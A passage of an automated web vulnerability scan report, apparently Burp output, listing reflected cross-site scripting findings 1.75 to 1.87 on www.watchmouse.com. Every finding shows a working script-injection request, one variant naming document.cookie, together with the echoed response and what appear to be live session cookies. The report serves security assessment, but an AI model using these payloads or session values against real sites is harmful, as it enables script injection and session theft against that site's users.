Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:36 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-6c28c41eb8a5ad96c79d9e6815400853"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/register.php6dcd2"><script>alert(1)</script>9e0e36560e6" method="post">
...[SNIP]...

1.75. http://www.watchmouse.com/de/register.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/register.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e025"><script>alert(1)</script>42b73a4c46b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/register.php?vpackid=35&6e025"><script>alert(1)</script>42b73a4c46b=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:09:34 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-f7ca374cbe50be1a3e973b9c1ca8f862"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<a href="/en/register.php?vpackid=35&6e025"><script>alert(1)</script>42b73a4c46b=1" onclick="$('#lang-menu').toggle();">
...[SNIP]...

1.76. http://www.watchmouse.com/en/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/

Issue detail

The value of the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4bed"><script>alert(1)</script>bd540385b51 was submitted in the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=1e4bed"><script>alert(1)</script>bd540385b51 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.5.10.1297252772

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:02:17 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-bba15ddb1485928b0e2ed1f78935fb0e"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 18584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=1e4bed"><script>alert(1)</script>bd540385b51" method="post">
...[SNIP]...

1.77. http://www.watchmouse.com/en/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddd46"><script>alert(1)</script>0d01ced535 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enddd46"><script>alert(1)</script>0d01ced535/ HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297196240.1

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:13 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-8554a5262131e380356c4537126bf406"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 12965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enddd46"><script>alert(1)</script>0d01ced535/" method="post">
...[SNIP]...

1.78. http://www.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d071"><script>alert(1)</script>03249d204b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/?3d071"><script>alert(1)</script>03249d204b0=1 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297196240.1

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 11:59:10 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-55cd5f01c95c28f94b01433ddf670d2b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 17963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/?3d071"><script>alert(1)</script>03249d204b0=1" method="post">
...[SNIP]...

1.79. http://www.watchmouse.com/en/about.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/about.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bf3a"><script>alert(1)</script>b4e05ffea6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en5bf3a"><script>alert(1)</script>b4e05ffea6/about.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-2de1b838baead941d451f7712423405f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en5bf3a"><script>alert(1)</script>b4e05ffea6/about.php" method="post">
...[SNIP]...

1.80. http://www.watchmouse.com/en/about.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/about.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7666b"><script>alert(1)</script>9ef90d91779 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/about.php7666b"><script>alert(1)</script>9ef90d91779 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-e7137a3ab840a3e0251ac2115510deba"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/about.php7666b"><script>alert(1)</script>9ef90d91779" method="post">
...[SNIP]...

1.81. http://www.watchmouse.com/en/about.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/about.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53678"><script>alert(1)</script>acc434f8ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/about.php?53678"><script>alert(1)</script>acc434f8ec=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-5bbd8836fd93c32f613212de15af152a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/about.php?53678"><script>alert(1)</script>acc434f8ec=1" method="post">
...[SNIP]...

1.82. http://www.watchmouse.com/en/awards.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/awards.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d4da"><script>alert(1)</script>12f28bd53ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en5d4da"><script>alert(1)</script>12f28bd53ff/awards.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-9caa1a1cacc0e392a60c7accf386dd39"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en5d4da"><script>alert(1)</script>12f28bd53ff/awards.php" method="post">
...[SNIP]...

1.83. http://www.watchmouse.com/en/awards.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/awards.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 274a5"><script>alert(1)</script>1d422000328 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/awards.php274a5"><script>alert(1)</script>1d422000328 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-ffdc20efafc92e2e0699b688cca30de0"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/awards.php274a5"><script>alert(1)</script>1d422000328" method="post">
...[SNIP]...

1.84. http://www.watchmouse.com/en/awards.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/awards.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9943f"><script>alert(1)</script>4b064af620f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/awards.php?9943f"><script>alert(1)</script>4b064af620f=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-5da1abc66a03112f1248117e231da5b8"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/awards.php?9943f"><script>alert(1)</script>4b064af620f=1" method="post">
...[SNIP]...

1.85. http://www.watchmouse.com/en/chat.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/chat.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0b7b"><script>alert(1)</script>3befea24e05 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enb0b7b"><script>alert(1)</script>3befea24e05/chat.php HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:48 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-f92f46d24cd5d6a4dbfaaceeddb9f65e"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enb0b7b"><script>alert(1)</script>3befea24e05/chat.php" method="post">
...[SNIP]...

1.86. http://www.watchmouse.com/en/chat.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/chat.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25bf8"><script>alert(1)</script>8beb7a83912 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/chat.php25bf8"><script>alert(1)</script>8beb7a83912 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:56 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-00e8fce91f2cb68dcce9f1b6e0858e63"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/chat.php25bf8"><script>alert(1)</script>8beb7a83912" method="post">
...[SNIP]...

1.87. http://www.watchmouse.com/en/checkit.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/checkit.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11bc5"><script>alert(1)</script>0030cd96bc9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en11bc5"><script>alert(1)</script>0030cd96bc9/checkit.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:13 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-d014d22cc44f7c6df17d734e8e868497"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
